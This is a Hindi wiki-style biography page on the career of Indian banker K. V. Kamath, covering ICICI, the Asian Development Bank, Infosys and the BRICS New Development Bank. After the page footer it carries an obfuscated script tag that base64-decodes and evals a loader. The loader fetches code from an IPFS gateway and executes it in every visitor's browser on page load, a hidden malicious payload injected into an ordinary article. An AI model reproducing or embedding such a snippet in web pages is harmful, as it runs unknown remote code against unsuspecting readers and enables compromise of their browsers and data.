के. वी. कामथ का कॅरियर

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:नेविगेशन, खोजें
के. वी. कामथ विषय सूची


के. वी. कामथ का कॅरियर
के. वी. कामथ
के. वी. कामथ
पूरा नाम कुंदापुर वामन कामथ
जन्म 2 दिसम्बर 1947
जन्म भूमि कर्नाटक, मंगलौर
अभिभावक विश्वनाथ कामथ
पति/पत्नी राजलक्ष्मी कामथ
कर्म भूमि भारत
कर्म-क्षेत्र उद्योगपति
शिक्षा राष्ट्रीय प्रौद्योगिकी संस्थान, भारतीय प्रबंध संस्थान
पुरस्कार-उपाधि पद्म भूषण
प्रसिद्धि आईसीआईसीआई बैंक के गैर-कार्यकारी चेयरमैन
नागरिकता भारतीय
अन्य जानकारी कामथ कॉन्फ़ेडरेशन ऑफ़ इंडियन इंडस्ट्री (सीआईआई) के राष्ट्रिय समिति के सदस्य भी हैं।
अद्यतन‎

के. वी. कामथ भारतीय बैंकिंग क्षेत्र के दिग्गजों में से एक हैं। वो निजी क्षेत्र के सबसे बड़े बैंक आईसीआईसीआई बैंक के पूर्व प्रबंध निदेशक और मुख्य कार्यकारी अधिकारी रह चुके हैं और वर्तमान में वह इसके गैर-कार्यकारी चेयरमैन हैं। केवी कामथ जून 2015 में उभरते विकासशील देश ब्राजील, रूस, भारत, चीन और दक्षिण अफ्रीका (ब्रिक्स) देशों द्वारा स्थापित किए जा रहे 50 अरब डॉलर के न्यू डवेलपमेंट बैंक (एनडीबी ) के मुखिया चुने गए।[1]

कॅरियर

के. वी. कामथ ने इंडियन इंस्टिट्यूट ऑफ़ मैनेजमेंट, अहमदाबाद, से प्रबंधन की शिक्षा पूरी करने के बाद वर्ष 1971 में आईसीआईसीआई (इंडस्ट्रियल क्रेडिट एंड इन्वेस्टमेंट कारपोरेशन ऑफ़ इंडिया) के साथ अपने कॅरियर की शुरुआत की। आईसीआईसीआई में ‘प्रोजेक्ट फाइनेंस’ से लेकर उन्होंने धीरे-धीरे संस्था के लगभग हर विभाग में कार्य किया। वहां उन्होंने प्रबंधन की जिम्मेदारियां भी संभाली और इसी के तहत आईसीआईसीआई के कार्य-प्रणाली का कम्प्यूटरीकरण भी प्रारम्भ किया। इस प्रकार उन्होंने आईसीआईसीआई में कम्प्यूटरीकरण प्रारंभ कर भारत के बैंकिंग क्षेत्र में बड़ा बदलाव किया।

वर्ष 1988 में कामथ एशियन डेवलपमेंट बैंक, मनीला (फिलीपींस), चले गए जहाँ उन्होंने बैंक के ‘प्राइवेट सेक्टर’ विभाग में कार्य किया। एशियन डेवलपमेंट बैंक में कार्य करते हुए उन्होंने चाइना, भारत, फ़िलीपीन्स, बांग्लादेश, इंडोनेशिया और वियतनाम के कई वित्तीय परियोजनायों पर काम किया। उन्होंने कंपनियों के बोर्ड पर एशियन डेवलपमेंट बैंक के प्रतिनिधि के तौर पर कार्य किया।[1]

वर्ष 1996 में कामथ आईसीआईसीआई में प्रबंध निदेशक और मुख्य कार्यकारी अधिकारी के रूप में वापस आ गए। यहाँ आकर उन्होंने समूह की सेवावों को रिटेल ग्राहकों तक फैलाया। वर्ष 1996 और 1998 के मध्य उनके नेतृत्व में आईसीआईसीआई ने कई ‘नॉन-बैंकिंग फाइनेंसियल कंपनियों’ का अधिग्रहण किया, जिसने ‘आईसीआईसीआई बैंक’ के स्थापना का मार्ग प्रसस्त किया। मई 2011 में उन्हें भारत के दूसरे सबसे बड़े सॉफ्टवेयर निर्यातक ‘इनफ़ोसिस’ का गैर-कार्यकारी अध्यक्ष चुना गया।

कामथ बहुत से शिक्षण संस्थानों के गवर्निंग बोर्ड के सदस्य भी हैं। इनमें प्रमुख हैं इंडियन इंस्टिट्यूट ऑफ़ मैनेजमेंट, अहमदाबाद, इंडियन स्कूल ऑफ़ बिज़नस, नेशनल इंस्टिट्यूट ऑफ़ बैंक मैनेजमेंट, पंडित दीनदयाल पेट्रोलियम यूनिवर्सिटी और गांधीनगर मनिपाल अकैडमी ऑफ़ हायर एजुकेशन। इसके अलावा वह इंडियन इंस्टिट्यूट ऑफ़ मैनेजमेंट, इंदौर, के गवर्निंग बोर्ड के अध्यक्ष भी हैं। कामथ कॉन्फ़ेडरेशन ऑफ़ इंडियन इंडस्ट्री (सीआईआई) के राष्ट्रिय समिति के सदस्य भी हैं। जून 2015 में केवी कामथ को उभरते विकासशील देश ब्राजील, रूस, भारत, चीन और दक्षिण अफ्रीका (ब्रिक्स) देशों द्वारा स्थापित किए जा रहे 50 अरब डॉलर के न्यू डवेलपमेंट बैंक (एनडीबी ) का प्रमुख नियुक्त किया गया।[1]


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. 1.0 1.1 1.2 के. वी. कामथ (हिन्दी) itshindi.com। अभिगमन तिथि: 03 अक्टूबर, 2017।

बाहरी कड़ियाँ

संबंधित लेख

के. वी. कामथ विषय सूची


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>